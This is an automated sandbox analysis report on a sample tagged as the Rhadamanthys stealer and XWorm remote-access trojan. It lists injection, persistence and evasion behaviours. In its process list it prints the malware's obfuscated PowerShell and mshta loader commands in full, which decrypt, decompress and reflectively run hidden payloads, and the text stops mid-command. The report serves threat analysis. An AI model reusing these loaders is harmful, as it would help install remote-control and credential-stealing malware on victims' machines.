Malware Analysis Report

2025-05-05 22:24

Sample ID 231010-plsnbsdd7z
Target https://google.com
Tags
rhadamanthys xworm agilenet rat stealer trojan
score
10/10


Analysis Overview

score
10/10

Threat Level: Known bad

The file https://google.com was found to be: Known bad.

Malicious Activity Summary

rhadamanthys xworm agilenet rat stealer trojan

Rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Detect Xworm Payload

Xworm

Detect rhadamanthys stealer shellcode

Obfuscated with Agile.Net obfuscator

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in Windows directory

Program crash

Enumerates physical storage devices

Kills process with taskkill

Suspicious use of FindShellTrayWindow

Views/modifies file attributes

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious use of SetWindowsHookEx

Suspicious use of SendNotifyMessage

Uses Task Scheduler COM API

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Checks SCSI registry key(s)

Modifies registry class

Runs ping.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-10 12:25

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-10 12:25

Reported

2023-10-10 12:36

Platform

win10-20230915-en

Max time kernel

635s

Max time network

641s

Command Line

winlogon.exe

Signatures

Detect Xworm Payload


Detect rhadamanthys stealer shellcode


Rhadamanthys

stealer rhadamanthys

Xworm

trojan rat xworm

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2445638973-2158012892-84912826-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2445638973-2158012892-84912826-1000\Control Panel\International\Geo\Nation C:\Windows\$sxr-mshta.exe N/A

Obfuscated with Agile.Net obfuscator

agilenet

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4264 set thread context of 5024 N/A C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe C:\Windows\System32\dllhost.exe
PID 4264 set thread context of 4392 N/A C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 3556 set thread context of 3896 N/A C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe C:\Windows\System32\dllhost.exe
PID 3556 set thread context of 4304 N/A C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4264 set thread context of 4016 N/A C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe C:\Windows\System32\dllhost.exe
PID 4264 set thread context of 4560 N/A C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 3556 set thread context of 4900 N/A C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe C:\Windows\System32\dllhost.exe
PID 3556 set thread context of 4060 N/A C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2276 set thread context of 3676 N/A C:\Users\Admin\Desktop\all-cracked-rats-main\XWorm V5.0\crack.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4544 set thread context of 1796 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3632 set thread context of 3500 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\rescache\_merged\1601268389\3877292338.pri C:\Windows\system32\taskmgr.exe N/A
File created C:\Windows\rescache\_merged\4183903823\810424605.pri C:\Windows\system32\taskmgr.exe N/A
File opened for modification C:\Windows\$sxr-cmd.exe C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe N/A
File created C:\Windows\$sxr-powershell.exe C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe N/A
File opened for modification C:\Windows\$sxr-powershell.exe C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe N/A
File opened for modification C:\Windows\$sxr-mshta.exe C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe N/A
File created C:\Windows\$sxr-cmd.exe C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe N/A
File created C:\Windows\$sxr-mshta.exe C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133414143416546858" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2445638973-2158012892-84912826-1000_Classes\Local Settings C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance C:\Windows\$sxr-mshta.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\7-Zip\7zG.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3748 wrote to memory of 4220 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 424 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3748 wrote to memory of 3092 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://google.com

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff961339758,0x7ff961339768,0x7ff961339778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1772 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1612 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2104 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2988 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2996 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4332 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3712 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4748 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3756 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4812 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4748 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5380 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5888 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5940 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap18788:92:7zEvent4774

C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe

"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\FutureCracked.jar"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5020 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:2

C:\Windows\system32\werfault.exe

werfault.exe /h /shared Global\03bbf9cb65724dbfa51d76f0b2aee11e /t 5036 /p 4880

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe

"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\SnowV4Cracked.jar"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3120 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:1

C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe

"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\PhobosCrackedCLEAN.jar"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5936 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:8

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap14911:96:7zEvent6696

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\888RAT\888rat-install.bat" "

C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe

"888rat-install.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function agDFc($vCpVI){ $Qviqn=[System.Security.Cryptography.Aes]::Create(); $Qviqn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Qviqn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Qviqn.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eSyKXuxugFflvGlW9qE6Iqg8XcAom2v4/DjQoKKC570='); $Qviqn.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9iro50udEDaxZ/wkUff9RA=='); $FmMlx=$Qviqn.CreateDecryptor(); $return_var=$FmMlx.TransformFinalBlock($vCpVI, 0, $vCpVI.Length); $FmMlx.Dispose(); $Qviqn.Dispose(); $return_var;}function cZEYh($vCpVI){ $WLTiH=New-Object System.IO.MemoryStream(,$vCpVI); $KNxYU=New-Object System.IO.MemoryStream; $LOvEr=New-Object System.IO.Compression.GZipStream($WLTiH, [IO.Compression.CompressionMode]::Decompress); $LOvEr.CopyTo($KNxYU); $LOvEr.Dispose(); $WLTiH.Dispose(); $KNxYU.Dispose(); $KNxYU.ToArray();}function fELFD($vCpVI,$TXpag){ $fzHaG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$vCpVI); $UtByz=$fzHaG.EntryPoint; $UtByz.Invoke($null, $TXpag);}$QLGin=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Desktop\888RAT\888rat-install.bat').Split([Environment]::NewLine);foreach ($AkEcQ in $QLGin) { if ($AkEcQ.StartsWith('SEROXEN')) { $fJBxd=$AkEcQ.Substring(7); break; }}$CjuJm=[string[]]$fJBxd.Split('\');$hxBpb=cZEYh (agDFc ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($CjuJm[0])));$OyvxC=cZEYh (agDFc ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($CjuJm[1])));fELFD $OyvxC (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));fELFD $hxBpb (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));

C:\Windows\System32\NOTEPAD.EXE

"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\888RAT\888rat-install.bat

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\888RAT\888rat-install.bat"

C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe

"C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{d1e563b0-7106-4c13-b3d5-c92b1bec6713}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{43aa39a3-1ed8-427f-b4c7-cd139687cd03}

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\888RAT\888rat-install.bat"

C:\Windows\$sxr-mshta.exe

C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-jUsBURfHSoufmNeEAjpO4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"

C:\Windows\$sxr-cmd.exe

"C:\Windows\$sxr-cmd.exe" /c %$sxr-jUsBURfHSoufmNeEAjpO4312:&#<?=%

C:\Windows\$sxr-powershell.exe

C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function hufeg($iDMxb){ $Elzpw=[System.Security.Cryptography.Aes]::Create(); $Elzpw.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Elzpw.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Elzpw.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk='); $Elzpw.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA=='); $wCTZr=$Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')(); $YgtPo=$wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iDMxb, 0, $iDMxb.Length); $wCTZr.Dispose(); $Elzpw.Dispose(); $YgtPo;}function FJcTY($iDMxb){ $KHdof=New-Object System.IO.MemoryStream(,$iDMxb); $mdDGq=New-Object System.IO.MemoryStream; $PZsap=New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::Decompress); $PZsap.CopyTo($mdDGq); $PZsap.Dispose(); $KHdof.Dispose(); $mdDGq.Dispose(); $mdDGq.ToArray();}function vUmWc($iDMxb,$PbTpW){ $YHPse=[System.Reflection.Assembly]::Load([byte[]]$iDMxb); $aMqIy=$YHPse.EntryPoint; $aMqIy.Invoke($null, $PbTpW);}$Elzpw1 = New-Object System.Security.Cryptography.AesManaged;$Elzpw1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$lkChZ = $Elzpw1.('rotpyrceDetaerC'[-1..-15] -join '')();$kveij = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('skxuT638mXYXO82tnMu4Nw==');$kveij = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij, 0, $kveij.Length);$kveij = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij);$uYwHJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 
'')('7tPhtRoBPpmbD4jKqCrROmZ5ihpYMWVokvpj2Ng/Pz8=');$uYwHJ = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uYwHJ, 0, $uYwHJ.Length);$uYwHJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uYwHJ);$XPhKE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MN4dM3v9612JtLqaveCMYg==');$XPhKE = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XPhKE, 0, $XPhKE.Length);$XPhKE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XPhKE);$muibj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('omE0gz6POPNwhNmUAnPGH44LhwPPACLWik/KT0dk5wsKXAxtKag+L5FPGR5kaqhlGUck2HtfdRNBwrYMOEAetiGgAox0exmtDDnAYLadphZBvi4OP8B8BNL4k5y/z1AEr7oudmgyCQifH3aXxa/gUUa4xjDsSD2YTOub7PHlsdmqG91RSBUMJH4vfT2zptSsj0OSscQsY4xVPZ8OjeRKbzP+BjF+Uue1s9LcXQdrizsUEKJN4dY28g0skU19VzfudgJv7Qa+SS93YCgWa9n+oNhygZquca/xgmF4Z+su7WedF+8tBgUKzviRtdEdVgLq/OMSlirCLjvFnSHC2y9K1oTEEyD1mQB836kwPebOOTmBNH6vdn2bEQQYiF/vc3FItt5vYPuWyJGzUen95KOQjYu7YoPz/dFXDUgmI65vnuw=');$muibj = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($muibj, 0, $muibj.Length);$muibj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($muibj);$DHHcr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tYnkG6mWBgWnZf6oIR3L5A==');$DHHcr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DHHcr, 0, $DHHcr.Length);$DHHcr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DHHcr);$EQNXr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5fF2zWzAZ0BefyD1XaGcLw==');$EQNXr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EQNXr, 0, $EQNXr.Length);$EQNXr = [System.Text.Encoding]::('8FTU'[-1..-4] -join 